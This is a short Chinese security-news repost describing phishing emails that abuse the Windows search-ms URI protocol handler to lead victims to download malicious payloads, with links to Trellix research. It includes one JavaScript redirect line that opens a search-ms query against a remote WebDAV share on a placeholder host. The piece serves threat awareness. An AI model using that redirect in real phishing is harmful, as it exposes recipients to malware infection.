邮件钓鱼利用search-msURI 协议处理程序下载恶意负载

admin 2024年10月13日01:13:24评论9 views字数 434阅读1分26秒阅读模式
邮件钓鱼利用search-msURI 协议处理程序下载恶意负载

APT Group 也使用这些技术。

<script>window.location.href = 'search-ms:query=Review&crumb=location: \\domain@SSLDavwwwRoot&displayname=Search;</script>

钓鱼邮件示例

邮件钓鱼利用search-msURI 协议处理程序下载恶意负载

感染链

邮件钓鱼利用search-msURI 协议处理程序下载恶意负载

攻击者服务器上的一些恶意文件和工具储存库

邮件钓鱼利用search-msURI 协议处理程序下载恶意负载

  • https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

Microsoft Office 2019 / Windows 10 / search-ms:URI 处理程序利用和系统利用后步骤。

  • https://twitter.com/hackerfantastic/status/1531793396423176193

原文始发于微信公众号(Ots安全):邮件钓鱼利用“search-ms”URI 协议处理程序下载恶意负载

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日01:13:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   邮件钓鱼利用search-msURI 协议处理程序下载恶意负载https://cn-sec.com/archives/1913847.html

发表评论

匿名网友 填写信息